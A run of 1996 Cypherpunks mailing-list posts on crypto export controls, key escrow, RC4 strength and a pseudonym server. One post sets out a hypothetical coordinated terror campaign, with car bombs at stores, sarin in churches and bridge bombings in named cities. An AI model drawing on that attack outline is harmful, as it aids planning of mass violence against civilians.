> Tell it to the starving Cubans who have to watch Fidel sitting in his 
> palaces.

Perhaps, but I can think of a lot of examples.  Laws that make it illegal
to ask for money.  Laws that say you can't sit on the sidewalk.  Laws
that make it illegal to feed soup to people without a stack of permits
six feet high.  Laws that make it illegal to perform an excretory function
outdoors in a city with almost zero public toilets.  (You should have
gone before you became homeless. :)

Certainly, it would be naive to think that such laws are passed without
being targeted at particular populations of individuals, especially 
during a period when "compassion fatigue" is on the rise.  

Here in Seattle, we have an city attorney who specializes in creating
ordinances to annoy and harrass the underclass, often paving new roads
over former civil liberties in the process.

I'm not sure starving Cubans have anything to do with it. 

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eli+@gs160.sp.cs.cmu.edu
Date: Wed, 31 Jul 1996 07:58:40 +0800
To: cypherpunks@toad.com
Subject: Re: "Soft Targets" as Schelling Points
In-Reply-To: <+cmu.andrew.internet.cypherpunks+ElzJw:G00UfAA10Qt9@andrew.cmu.edu>
Message-ID: <199607302102.OAA11058@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May writes:
>Schelling points need not involve "coordination" between actors, though
>Schelling points provide one means of coordination without communication
>(e.g., where does each think a meeting will occur).
>
>Schelling points are like "The Match Game" (an old t.v. show largely
>written by one of the main contributors to "Mad Magazine").  Namely, "Name
>a place likely to be attacked by terrorists."

This isn't EconPunks, so I'll just say I haven't seen the term used
except in the context of tacit coordination (see <http://www.best.com/
~ddfr/Academic/Property/Property.html> for some examples).  There is
some coordination here, I guess: terrorists and television crews both
benefit from being in the same place when the bomb goes off.  But this
probably isn't a driving motivation for either.

--
   Eli Brandt
   eli+@cs.cmu.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Wed, 31 Jul 1996 08:35:34 +0800
To: Dan Harmon <harmon@tenet.edu>
Subject: Re: mailing list
In-Reply-To: <Pine.OSF.3.91.960729232549.29138A-100000@francis.tenet.edu>
Message-ID: <Pine.SCO.3.93.960730170154.11402C-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 29 Jul 1996, Dan Harmon wrote:

No, no, no.... 

The correct question is, "Are you a good witch, or a bad witch?"

(remember, house dropping on GAK policy wonks counts for five extra bonus
points)


> Are you a good turtle?
> 
> On Mon, 29 Jul 1996, Darryl Gittins wrote:
> > 
> > Hey...
> > 
> > how do I get on the mailing lissst....?

------------------------------------------------------------------------- 
|Just as the strength of the Internet is  |Mark Aldrich                 |
|chaos, so the strength of our liberty    |GRCI INFOSEC Engineering     |
|depends upon the chaos and cacophony of  |maldrich@grci.com            |
|the unfettered speech the First Amendment|MAldrich@dockmaster.ncsc.mil |
|protects - District Judge Stewart Dalzell|                             |
|_______________________________________________________________________|
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     |
|         and my employer gets no credit for them whatsoever.           |
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Wed, 31 Jul 1996 08:01:01 +0800
To: cypherpunks@toad.com
Subject: Re: TLAs on cypherpnks (was R
Message-ID: <199607302117.RAA14640@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


A story I heard: During a privacy conference back when Clipper was
first proposed (about 3 yrs ago) people were questioning an NSA rep 
about escrow.  He started off his rebuttal by asking "Is Sternlight 
here?" and then contined his reasoning as to why Clipper was a good 
thing.

Don't know if this actually happened, but I'm sure if it did some 
here would remember it.

--Rob

On 30 Jul 96 at 5:35, pjn@nworks.com wrote:

>  In> Is this the first confirmed report of TLA cypherpunk-monitoring?
> 
>  Might be the first reported, but many people probably thought it was...
>  I did...
 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@ACM.ORG>
Date: Wed, 31 Jul 1996 10:59:14 +0800
To: cypherpunks@toad.com
Subject: Re: WaPo on Crypto-Genie Terrorism
In-Reply-To: <v03007801ae242b4f7350@[192.187.162.15]>
Message-ID: <199607310026.RAA20205@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



David Sternlight <david@sternlight.com> writes:
>Preface: Having weathered the storm of personal attacks, I've concluded that
>most of what is on this list _right now_ is of insufficient interest to what
>I'm currently working on to continue, so I've unsubscribed (there's too much
>traffic to let it be). I will see the occasional posts copied to me and

"Stays less than a month" pays evens.
"Audibly killfiles at least one person" pays 1 to 7.

Stand not upon the order of your going, but go at once...

	Jim Gillogly
	Trewesday, 8 Wedmath S.R. 1996, 00:24




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephen Cobb <stephen@iu.net>
Date: Wed, 31 Jul 1996 08:47:28 +0800
To: cypherpunks@toad.com
Subject: Re: fbi, crypto, and defcon
Message-ID: <1.5.4.32.19960730213125.0038d8ec@iu.net>
MIME-Version: 1.0
Content-Type: text/plain


At 04:29 AM 7/30/96 -0700, Cerridwyn Llewyellyn <ceridwyn@wolfenet.com> wrote:
>        
>At this year's DefCon (last weekend), there were two speakers from the
>recently created FBI San Francisco Computer Crime division. they were there 
>as spokesmen for the FBI, but people could talk to them later and ask any
>questions they liked, and "the answers may surprise you".  Evidence that 
>maybe some goons really do have a clue, but are still too afraid to do
>anything about it... //cerridwyn//

I thought it was pretty cool that they even showed up, and the respect they
showed for people with good technical skills was, IMHO, impressive. They
were candid about the role they play and stood by the code of behaviour they
are sworn to uphold.

We simply don't have enough information to judge them. These guys may be
campaigning for political change in their spare time. They are enforcing
laws passed by a democratically elected government, which is not perfect,
but a long way from tyranny. They made the point, several times, that if we
don't like the laws we are free to try and get them changed, which some of
us are trying to do.

Okay, so their boss is part of the law making process, subject to the checks
and balances that exist between the three branches of US government. They
are in a position to supply their boss with data and I am personally
impressed with their grasp of some of that data (it sounds to me like they
are telling their boss that hackers like the ones at Defcon are not the
problem).

All of us who have some understanding of these issues need to do our best to
educate the public and the politicians, even if we have to start from the
"See Jane hack" level (pun intended). Otherwise dumb laws will be passed and
then we will have to engage in mass civil disobedience (which I have
personally done in the past). Stopping bad laws from becoming law is a lot
easier than overturning them later.

Respectfully...Stephen (hacker jeopardy scorekeeper)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephen Cobb <stephen@iu.net>
Date: Wed, 31 Jul 1996 08:13:06 +0800
To: cypherpunks@toad.com
Subject: Re: ALL OF YOU ARE CRIMINAL HACKERS, I AM GOING TO CALL FBI
Message-ID: <1.5.4.32.19960730213130.005d75f0@iu.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:33 PM 7/26/96 -0700, you wrote:
>I AM NOT GOING TO TOLERATE EXISTENCE OF A MEDIUM FOR CRIMINAL HACKERS
>AND MUNITIONS SMUGGLERS. I WILL COMPLAIN TO THE FBI IMMEDIATELY SO THAT THEY
>CAN TRACK YOU DOWN AND CLOSE THIS LIST.
>
As a Certified Information Systems Security Professional I am sworn to
uphold a professional code of ethics. I have pledged to help my clients
protect the privacy of their information. I do not consider the free
exchange of ideas as inconsistent with that plegde or those ethics.

Please feel free to email me directly with a statement of your specific
fears and concerns and I am sure I can allay them. Otherwise I suggest you
spend some time studying the US constitution and contemplating the personal
sacrifices made those who are dedicated to defending it.

Respectfully...Stephen





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Wed, 31 Jul 1996 11:25:51 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Let's Say "No!" to Single, World Versions of Software
In-Reply-To: <ae22e61d060210044d52@[205.199.118.202]>
Message-ID: <31FEAD9C.167E@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> 
> It is imperative that Netscape, Microsoft, Qualcomm, and the other
> players be pressured/urged/cajoled to commit to introducing strong,
> unescrowed crypto for the *domestic* versions, even if not for export
> versions.

I'm surprised that you include Netscape in this list of companies.
We're already distributing strong unescrowed crypto in domestic version
of our products, and we will continue to do so.  What do you think we
have to be pressured into doing?

> I believe several signs are pointing to jockeying in the U.S. to get
> the major players in software to introduce "one version" programs with
> key escrow built in. While the avowed intent will be to stop _export_
> of unescrowed strong crypto, such a "one version" (interoperable)
> strategy would mean that key escrow is the de facto situation within
> the United States.

We won't do this.  Our domestic version will always contain the
strongest crypto we can provide.

-- 
You should only break rules of style if you can    | Tom Weinstein
coherently explain what you gain by so doing.      | tomw@netscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Wed, 31 Jul 1996 09:24:39 +0800
To: jbugden@smtplink.alis.ca
Subject: RE: A Libertine Question
In-Reply-To: <9606298386.AA838689552@smtplink.alis.ca>
Message-ID: <Pine.SV4.3.91.960730182712.10011A-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 29 Jul 1996 jbugden@smtplink.alis.ca wrote:

> Think of how many of our laws are being enacted that tacitly make being
> poor or indigent a crime.

   Horseshit. This is a poorly-disguised re-tread of one of the standard 
lines of the Patrice Lumumba University brand of leftist agitprop.

Tell it to the starving Cubans who have to watch Fidel sitting in his 
palaces.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 31 Jul 1996 10:17:06 +0800
To: jimbell@pacifier.com (jim bell)
Subject: Re: You know it's getting late when...
In-Reply-To: <199607301743.KAA10519@mail.pacifier.com>
Message-ID: <199607302336.SAA11132@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


jim bell wrote:
> 
> Ostensibly, one of the reasons for having a free and fair political system 
> is so people will not be inclined to throw bombs and plot violent 
> revolution.  Grandly ignoring this, that reporter seems to take the 
> diametrically opposite tack:  A totalitarian government can best avoid 
> bombings and violence.
> 

Actually the graph goes like this: 

^ Non-State Terrorism
|
|            ..-..
|          /~     \
|       .-~        \
|..---/~            ~-.
+------------------------------------------------> Level of Totalitarianism

^ State Terrorism
|
|          -------------------------------------
|       .-~
|    .-~
| .-~
|/
+------------------------------------------------> Level of Totalitarianism

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@dorsai.dorsai.org>
Date: Wed, 31 Jul 1996 09:55:49 +0800
To: David Sterndark <david@sternlight.com>
Subject: Re: WaPo on Crypto-Genie Terrorism
In-Reply-To: <v03007801ae242b4f7350@[192.187.162.15]>
Message-ID: <Pine.SUN.3.91.960730180418.4149A-100000@dorsai>
MIME-Version: 1.0
Content-Type: text/plain


Oh, how utterly cool.  This being my 1st reply to Sterndark and in the 
same having managed to move him off the list.  Wheeeee! :)

Come on, you could do better than to run off...

On Tue, 30 Jul 1996, Da5id Sterndark wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Preface: Having weathered the storm of personal attacks, I've concluded that
> most of what is on this list _right now_ is of insufficient interest to what
> I'm currently working on to continue, so I've unsubscribed (there's too much
> traffic to let it be). I will see the occasional posts copied to me and
> respond, Posts allegedly from me, if not signed, are forgeries until I post
> a signed notice that I have rejoined the list.
> 
> Thanks for putting up with my spamming flame-bait;
> Da5id
> 
> At 12:37 PM -0700 7/30/96, Ray Arachelian wrote:
> >On Mon, 29 Jul 1996, David Sterndark wrote:
> >
> >> Let those who passed basic English use the skills they were taught. Freeh
> >> said, and I repeated, that the system wasn't designed to prevent
> determined
> >> criminals from using robust crypto.
> >
> >Yes, and the implication is this: the system was designed to prevent law
> >abiding folk from using robust crypto, and to allow the TLA's and LEA's
> >to snoop on them.
> 
> Close. For "designed to prevent" read "not make available from the US", and
> for "folk" read "foreigners".
> 
> There's no earthly reason the US should assist foreigners in thwarting US
> intelligence efforts.

Right, but there's plenty of earthly reason for the government of these 
same United States to thwart the development of strong crypto, cause the 
loss of monies that would be made by software companies, cause security 
breeches in multi-homed companies by not allowing their offices to 
communicate securely over a strongly encrypted link.  This causes another 
equivalent of the Berlin wall in terms of crypto exporting.

Notice however that I didn't say Joe Sixpack was a foreigner or a criminal.  
You twisted this around to make it seem like he is.  Joe Sixpack is as 
American as apple pie and patriotic to boot.

So then if the laws are NOT designed to deter criminals (or foreginers)
from using strong crypto, WHY ARE THEY BEING PUSHED ON US?  Could this be
somehow a stupid idea on Freeh's part?  Nah, couldn't be.  Freeh's the
head of the Feebs.  That would be indication that the Feebs hire brainless
folk.  Nope.  Can't be.  Clearly it is because Freeh wants to snoop not on
criminals, but on the law-abiding citizens who pay his paycheck
"voluntarily" via taxes.

As wonderful as the postal inspector mailing kiddie porn to an unsuspecting 
victim, then arresting said victing when s/he opens up the package.  Gee, 
how nice it is to meet your arrest quotas, no?  But I digress.


Back to the ITAR and the proposed anti-crypto laws...

Nevermind that should a foreign agent wish to export RSA or PGP could
easily do so >LEGALLY< in a nice OCR'able font, or just have cheap labor 
type it.  Sure, tie the hands of the software developers so that 
they can't get their bread and butter from the foreign markets, while the
foreign markets can easily do so here since they can import and sell
crypto-software.

The ITARs only serve to cripple the USA ecconomy.  There's no informed NSA
or FBI that can believe otherwise because the other side does have all the
tools.  All they serve to achieve is to keep Joe Americancitizen Sixpack
away from his privacy, and Nancy Cryptowriter from her bread and butter.

What a wonderful law!  Don't you just love it?

> As readers know, I am opposed to mandatory domestic key escrow.

Ah, yet another repeat of the same tired credo you've pushed on this list 
for days now.  I've heard it, and okay, whatever.  But it's not the 
issue, and irrelevant to this discussion.

Are you for or against the removal of the ITAR in regards to crypto? ITARs
are not key escrow, though perhaps just as or almost as evil.



==========================================================================
 + ^ + |  Ray Arachelian |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@dorsai.org|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| --------------- |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | Just Say "No" to|KA|law abridging the freedom of speech' |==\|/==
 + v + | Janet Reno & GAK|AK|        do you not understand?       |=======   
===================http://www.dorsai.org/~sunder/=========================
 Key Escrow Laws are the mating calls of those who'd abuse your privacy!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: karl_marx@juno.com (Jonathan M Summers)
Date: Wed, 31 Jul 1996 09:57:56 +0800
To: cypherpunks@toad.com
Subject: G7 Anti-Terrorism Reports [BRIEF]
Message-ID: <19960730.173749.10327.0.karl_marx@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


Cypherpunks:

At 1735 CDT on Tuesday, July 30, 1996, CNN Atlanta during World News
Tonight reported (in a _very_ brief flash) several "resolutions" adopted
by the Group of Seven (G7) trade meeting in Paris.

At the bottom of the list of resolutions was to "prevent terrorist from
using the Internet" (quote from CNN anchorwoman).

No further explanation was given in regards to that statement, but
methinks that in wake of recent terroristic activities in this country,
Pro-CODE in Congress, and Netscape Navigator 3.0b3 in the hot little
hands of Americans everywhere, there could be a complete retreat from the
"progressive" attitude of legislators in this country towards strong
crypto.

John Young has already requested further information about the G7
meetings, and it would probably behoove us all to know precisely what it
was that was said before such a resolution was agreed upon.  Or, better
yet, whose idea it was to attempt to "prevent terrorists from using the
Internet."

Apologies to all if this is redundant information, and apologies to the
purists for intruding with this newsflash.

ObCrypto: Anyone have any more information on Royal Dutch Shell
apparently the first customer of TIS' firewall package with key escrow ?
Has such a purchase been confirmed, and if so, does it still entail an
agreement with the British government as an escrow agent ?

-J. Malcolm

+-=-+-=-+-=-+-=-+-=-+-=
j malcolm summers / karl_marx@juno.com / summersj@southwestern.edu
ignorance is not bliss
+-=-+-=-+-=-+-=-+-=-+-=




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Wed, 31 Jul 1996 11:45:04 +0800
To: cypherpunks@toad.com
Subject: Re: Paranoid Musings
In-Reply-To: <199607301811.LAA28373@netcom7.netcom.com>
Message-ID: <Pine.LNX.3.95.960730184416.879A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 30 Jul 1996, Bill Frantz wrote:

> (1) Now everyone knows that 40 bit RC4 is weak, but just how weak is it? 
> We know that a university CS student can break one message in a week using
> the universities farm of workstations.  But, our foremost reputation agency
> for crypto strength, the ITAR, allows systems with RC4-40 to be exported. 
> What does this mean?
> 
> I combine the above with Whit Diffie's observation that, while crypto users
> are interested in the security of *each* message, organizations which
> monitor communications want to read *every* message.  A TLA interested in
> monitoring communications would need to crack RC4-40 much faster than
> 1/week.
> 
> Now expensive specialized cracking equipment can certainly speed up the
> process, but there may be a better way.  If cryptanalysis of RC4 yields
> techniques which make the process much easier, then it is the ideal cypher
> to certify for export.
> 
> The paranoid conclusion is that there is a significant weakness in RC4.

An FPGA can break RC4 in a few hours.  With several thousand of these, RC4
could be broken in about a second.  Besides, RC4 has been around for 9 years
and has not been successfully cryptanalyzed.  The RC4 algorithm is extremely
simple and doesn't have any obvious weaknesses.

- -- Mark

PGP encrypted mail prefered
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/  


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMf6RNLZc+sv5siulAQH/mQP9G+J/7BnV0AlvvPph032k9SnZ8/hCOqNp
aGV3WScE0FhCqtlmazDa8xopWWX1jSd2ZEhJLthQ0k70QUkKPD+gOteLr3075kan
vTLOr2l4pP9b0AP20Wclw/upZ04QWgfF/YrIcSTHgwcvuxBlR49DKp/zqRcVLmaM
iW/D3AwSYJQ=
=GvZ2
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 31 Jul 1996 11:55:55 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: "Soft Targets" as Schelling Points
In-Reply-To: <ae1fb0ce0f021004c9ff@[205.199.118.202]>
Message-ID: <Pine.LNX.3.93.960727211239.2482C-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 28 Jul 1996, Timothy C. May wrote:
> Putting yourself in the mind of a terrorist or militia crazy or whatever,
> where would you attack?

     Ok, you asked. 

     Much depends on my goals. 

     If my goal is simply to get my name/cause in the paper, I would hit 
     major sporting events (Superbowl, World series, World Cup, olympics & 
     etc.) I would also hit cause specific targets (If I were a radical 
     tree hugger, I'd hit Werhauser(sp?) corporate offices, Dow Chemical 
     Offices etc.) If I were a black panther, I'd hit police stations, 
     Klan Headquaters, &etc. 

     These are far to elementary, after giving it some thought (well, it has 
been on and off my mind since G. Gordon Liddy published his open letter to the 
president many years ago:

     If my goal was to basically reduce this country to jelly, it would take 
(In my decidedly none professional judgement) about 20 or so men (20 two man
teams would be better, but the more people, the bigger chance of leakage, but
it would make their jobs easier) Anyway: call it 20 teams. 

     Saturday afternoon (preferably mid may) in 20 Walmarts across the 
country 20 stolen cars go boom (really big boom) at about the same time. 

     Sunday Morning Sarin gas introduced into churches.

     Monday Morning, Rush hour:
     In LA, New York, Boston, Miami, New Orleans, Phoenix, Chicago, 
San Francisco, St. Louis, San Diego, Seattle, Portland, Albuquerque, 
Las Vegas (is there a rush hour in Las Vegas?) Houston, Cinncinatti(sp?), 
Atlanta, Little Rock, Detriot, & Des moines, cars parked along side of 
the highway (near bridges were possible) blow up. Around noon that day, 
thermite and WP gernades (or home made equivalents) are ignited in the 
buisness districts (or casinos of Las Vegas). 


     The government will react with overwhelming restrictions of personal 
freedom, and the militas will react, the government will clamp down further,
the militias will gain popularity & america will divide itself. 
     
     If I were inclined to such behavior, and had the funding, That is how I 
would do it. 


     Other ideas: Random Shelling of business districts, airports and 
subdivisions.  

  
Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Wed, 31 Jul 1996 10:00:32 +0800
To: Bill Frantz <frantz@netcom.com>
Subject: RE: A Libertine Question
In-Reply-To: <199607300242.TAA05651@netcom8.netcom.com>
Message-ID: <Pine.SV4.3.91.960730191025.10011G-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


> Date: Mon, 29 Jul 1996 19:45:46 -0700
> From: Bill Frantz <frantz@netcom.com>

> government reserves the use of force to itself.


 In their dreams.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Wed, 31 Jul 1996 07:27:24 +0800
To: Jerome Tan <jti@i-manila.com.ph>
Subject: Re: Source Codes in C or Pascal
In-Reply-To: <01BB7E24.F8E80BE0@ip74.i-manila.com.ph>
Message-ID: <Pine.LNX.3.94.960730192428.579A-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 28 Jul 1996, Jerome Tan wrote:

> Date: Sun, 28 Jul 1996 15:42:41 +0800
> From: Jerome Tan <jti@i-manila.com.ph>
> To: "'cypherpunks@toad.com'" <cypherpunks@toad.com>
> Subject: Source Codes in C or Pascal
> 
> Does anyone knows where to find source codes of sample encryption programs? I just wanted to know how they work... Thanks in advance!
> 
> 

Any good cryptography book should have code in it.  Look in "Applied
Cryptography" by Bruce Schneier (sp?), it has lots of it in the back of
the book.

 --Deviant
This novel is not to be tossed lightly aside, but to be hurled with great force.
                -- Dorothy Parker


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMf5hxTAJap8fyDMVAQG4NQf+LyzI3NxQ2BHJi202vWvKd+ERVibyhSay
oKSAGALec87G7Y1A0Syhioqao1YFjIzYuRDWCuB4RFI9TmXXmDzU7YhLkqKMvX+Q
lFnysk3Z3vFx2Y5WM/KaBujIpSA9Kdyjk12jFPTUmD0s7hvl9tL54CTLPW27AYrv
u79lYrDgRB/nuGFmLt6j9ZrCtyVYu5yehRUffsKsdHSIKmV4s6i61lPBPQWmdHIt
/fk0f1GasdZpeOKoxkMtE6kGR3nhxKe+Dtio5942h5fHA5MxDGQZKlgOUXYgAmiu
yyYRqY7H2OwRSG3MHnoUrn5LMo8MqauEEuQIXKvD8N8ip7tkQv797A==
=nF0x
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcs Remailer Administrator <mix-admin@nym.alias.net>
Date: Wed, 31 Jul 1996 10:42:59 +0800
To: mail2news@anon.lcs.mit.edu
Subject: ANNOUNCEMENT: nym.alias.net enters beta testing
Message-ID: <199607302340.TAA27428@anon.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I'm pleased to announce that the nym.alias.net pseudonym server has
now entered the beta-testing phase, and seems quite stable.

Nym.alias.net offers several interesting features:

  * Public-Key encryption of all received mail.  Once mail has gone
    through nym.alias.net, no one can read it except you--even if you
    have been sending your mail to a newsgroup and your reply-block
    and remailers become compromised.

  * Support for multiple, probabilistically-weighted, reply blocks.
    These can be used for redundancy or to foil traffic analysis with
    decoys.

  * Replay detection.  This foils replay attacks, but can also be used
    for higher reliability if you send redundant copies of a message
    through different remailer chains.

  * An option to receive only fixed-length messages (by splitting up
    large messages and padding small ones with garbage).

  * An option to sign mail you send with the remailer's public key, so
    as to give some assurance of authenticity without having to
    publish your own PGP public key.

  * Support for finger [pending DNS approval].  You can choose to make
    your nym's PGP public key available to all who finger its E-mail
    address.  Right now you can test this by fingering at 18.26.0.252.

In addition, experimental nym.alias.net support for Premail is now
available (in the form of a patch to premail 0.44).  With this patch,
premail will store your nym's PGP key on encrypted keyrings.  This
allows you to publish a PGP key for your pseudonym without the danger
of your identity being revealed to someone with access to your main
PGP keyrings (or a backup copy of them).

To obtain more information about nym.alias.net, finger
<nymhelp@anon.lcs.mit.edu> or send mail to <help@nym.alias.net>.  To
get information about using premail with nym.alias.net, finger
<premail-info@anon.lcs.mit.edu> or send mail to
<premail-info@nym.alias.net>.

These documents are also available on the new nym.alias.net web page:
    http://www.cs.berkeley.edu/~raph/n.a.n.html

Please report all bugs to <admin@nym.alias.net>.  I'll also be glad to
consider feature requests, particularly from anyone interested in
developing any more client software.

Enjoy!

mix-admin@anon.lcs.mit.edu

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMf6dcUTBtHVi58fRAQE4NgP/SoKSqHxobEHuyWl6lXVAHgk9yqNS/WAD
jUfKYGodThr93kJZkmreyIHrWgbromJJlXo6MPq9KpZzIh85uHRzBPRSh293hfUo
ta8/sdZsW1+uoEkAs8JUWlwAEGo+bfmgRnFswf80pAPClpbGo52DAKyLKfdCaFps
kQ+4hoouUvo=
=qEWa
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 31 Jul 1996 13:29:31 +0800
To: frissell@panix.com>
Subject: Re: Dry Under the Waterfall
Message-ID: <199607310251.TAA13176@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:32 PM 7/30/96 -0400, Perry E. Metzger wrote:

>Untrue, Duncan. Far more than 5% of the population is online already,
>and the numbers are expanding rapidly. Soon even the semi-literate
>will be on line, if only so they can get the latest pornography and
>sports videos.

Don't forget the pipe-bomb designs!

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: forsvunnet@alpha.c2.org ()
Date: Wed, 31 Jul 1996 14:15:45 +0800
To: cypherpunks@toad.com
Subject: New Clinton (anti-) Encryption Policy nnn
Message-ID: <199607310252.TAA21457@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Thought you all might be interested in these documents.  They were put out as press releases internationaly on 7/25.

It occurs to me that the list of companies collaborating with the Department of Commerce on key escrow must be publically available.  If someone could get a copy it would allow us all to contact those companies with our views and (more importantly) begin a campaign against companies supporting the escrow project on the net.

Here are the press releases:

CLINTON ADMINISTRATION FACT SHEET: U.S. CRYPTOGRAPHY POLICY (Industry, international cooperation urged)

WASHINGTON -- Because advanced encryption technology is posing problems for  law-enforcement officials to investigate crimes and terrorism, the Clinton administration is  pressing for a global system for unlocking encrypted messages when necessary. 
A July 12 fact sheet from the U.S. Department of Commerce elaborates the administration  approach, called key recovery encryption.

While the United States sets no limit on the level of encryption technology that can be used  domestically, it does restrict exports of it.  The administration says it might relax those export  controls if U.S. industry cooperates on building a key recovery infrastructure. 

Following is the text of the fact sheet:

(begin text)

U.S. Cryptography Policy: Why We Are Taking the Current Approach 
We live in an age of electronic information.  Information technology is transforming society,  creating new businesses, new jobs and new careers.  The technology also creates new  opportunities for crime and new problems in investigating and prosecuting crime.  As a result,  electronic information, be it corporate trade secrets, pre-release government crop statistics, or a  patient's medical records, must have strong protection from uninvited modifications or disclosure.   Cryptography enables that protection. 

The United States is the world leader in information technology. U.S. firms continue to dominate  the U.S. and global information systems market.  Retaining this leadership is important to our  economic security.  The Clinton administration, through its National Information Infrastructure  initiative, has long recognized that government has an important role as a facilitator and catalyst  for the industry-led transformation of the way we use computer and  communications technology  to work and live.

In particular, government has a strong interest in promoting the legitimate use of robust  encryption to support U.S. international competitiveness, foster global electronic commerce,  prevent computer crime, and ensure that the information superhighway is a safe place to conduct  one's business.  At the same time, there is a growing recognition, affirmed most recently by the  National Academy of Sciences, that the use of encryption to conceal illegitimate activities "poses a  problem for society as a whole, not just for law enforcement and national security."  In brief,  criminals can use encryption to frustrate legal wiretaps and render useless search warrants for  stored electronic data.  We know of no technical solution to the problems that would result from  the global proliferation of strong cryptography.  The implications of this are no small matter. 
Encrypted computer files have hampered the prosecution of child pornographers.  Militia groups  advise their members to use encryption to hide illicit weapons, financial, and other criminal  activities.  Aldrich Ames was instructed by his Soviet handlers to encrypt computer files that he  passed to the Soviets.  And international terrorists and drug dealers increasingly use encryption to  prevent law enforcement officials from reading their voice and data transmissions.  Grave crimes,  such as a plot to shoot down several airliners over Chicago, have been foiled by the use of  wiretaps.  Had the FBI been unable to read those transmissions, however, a major tragedy might  have ensued.

Cracking Coded Messages

We should not underestimate how difficult it is to decode encrypted electronic information.  One  approach advanced in the popular debate is to provide our law enforcement officials with more  computing power.  At first glance, this suggestion seems promising because in theory any  encrypted message can be decoded if enough computing cycles are applied.  This approach fails  for five reasons: 

First, it relies on mathematical theory, not operational reality.  Digital technology reduces voice,  faxes, images, and text in any language to indistinguishable 1s and 0s.  A great variety of  encryption products are also available.  Under ideal conditions -- if the type of communication or  file, language, and encryption algorithm are known with certainty, and a short key is used to  encrypt the information -- a large, specially designed computer could decode a single message  relatively quickly.  But state, local, and federal law enforcement officials do not operate in the  clean confines of a high-tech computer center.  They must first capture the 1s and 0s and discern  what kind of encryption they have encountered.

Second, after the decoding problem is isolated, acquiring a machine to decode a message is  neither quick, easy or inexpensive.  Commercially available computers could not be used because  they will not have sufficient capacity.  It would, for example, take years for the computers used to  process all Social Security claims, payments and earnings years to decode one message using the  Data Encryption Standard (DES), a widely used system originally developed by the U.S.  government that uses a 56-bit key.

Third, this approach betrays a misunderstanding of how crimes are prevented.  Used only in the  most critical cases, legally authorized wiretaps provide crucial information just before a crime is  to occur.  Thus a near real-time ability to decode messages is needed.  Days or weeks are too long  to wait to find out that a terrorist attack is about to happen. 
